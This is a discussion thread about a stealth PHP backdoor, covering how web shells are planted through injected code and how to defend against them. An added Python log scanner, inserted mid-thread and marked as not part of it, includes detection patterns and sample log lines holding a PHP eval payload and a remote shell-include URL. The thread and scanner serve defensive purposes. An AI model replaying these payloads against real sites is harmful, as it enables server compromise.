
Hookworm Stealth PHP Backdoor - ssclafani
http://www.madirish.net/?article=489
======
jaryd
Poster is spot on that C99 is not very stealth. I remember getting hit with
this guy a few months ago -- very easy to diagnose and clean up.

~~~
OstiaAntica
How did you get hit by it? I don't understand the attack vector, unless you
are allowing php file uploads?

~~~
dibarra
A common way is just script vulnerabilities, allowing execution of arbitrary
code. I work at a popular webhosting company, and I've seen cases where apps
will execute PHP code inserted as a spoofed User-Agent, POST data, and other
weird places. The idea is that you send a payload that executes on the remote
host, GETs your shell from some free webhost or another compromised account,
and then saves it on the target machine. At that point, you're set.

mod_security can help for people running Apache, and so will using maintained
and up to date scripts.

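As an added illustration (my own code, not from this thread), here is a small scanner that flags the pattern dibarra describes in Apache combined-format access logs: PHP code arriving in the User-Agent or request line, and a query parameter pointing at a remote URL (the fetch-the-shell step). The log lines are constructed; the regexes are an assumed, deliberately narrow set of markers, not a complete ruleset.

```python
import re
from urllib.parse import unquote

# Apache "combined" log format; we only need the request line and User-Agent.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Assumed markers: PHP tags / dangerous calls where only plain text belongs,
# and a parameter whose value is a remote URL (classic remote-include shape).
PHP_CODE = re.compile(
    r'<\?php|\b(eval|system|passthru|shell_exec|base64_decode|file_put_contents)\s*\(',
    re.I,
)
REMOTE_INCLUDE = re.compile(r'[?&][A-Za-z_]+=(https?|ftp)://', re.I)


def parse_line(line):
    """Return the combined-log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(entry):
    """List the reasons an entry looks like a code-injection attempt (empty if clean)."""
    reasons = []
    # Decode %XX escapes so an encoded payload in the URL is inspected as sent.
    request = unquote(entry["request"])
    if PHP_CODE.search(entry["ua"]):
        reasons.append("php-code-in-user-agent")
    if PHP_CODE.search(request):
        reasons.append("php-code-in-request")
    if REMOTE_INCLUDE.search(request):
        reasons.append("remote-url-in-parameter")
    return reasons


def scan(lines):
    """Return (ip, request, reasons) for every parseable line that raises a flag."""
    hits = []
    for line in lines:
        entry = parse_line(line)
        if entry and (reasons := classify(entry)):
            hits.append((entry["ip"], entry["request"], reasons))
    return hits


# Constructed sample: one benign request, one PHP payload in the User-Agent,
# one request fetching a remote file through a query parameter.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Oct/2011:13:55:36 +0000] "GET /index.php HTTP/1.1" 200 2326 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [10/Oct/2011:13:55:40 +0000] "GET /index.php HTTP/1.1" 200 512 "-" "<?php eval(base64_decode(\'Zm9v\')); ?>"',
    '198.51.100.8 - - [10/Oct/2011:13:56:01 +0000] "GET /index.php?page=http://example.com/shell.txt HTTP/1.1" 200 100 "-" "curl/7.21"',
]

if __name__ == "__main__":
    for ip, request, reasons in scan(SAMPLE_LOG):
        print(ip, request, ", ".join(reasons))
```

POST bodies are not in the access log, so the same checks on POST data have to run inside the application or in a filter such as mod_security.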
~~~
Joakal
Another is: don't run PHP scripts in the uploads directory [0].

[0] "Pass Non-PHP Requests to PHP." <http://wiki.nginx.org/Pitfalls>

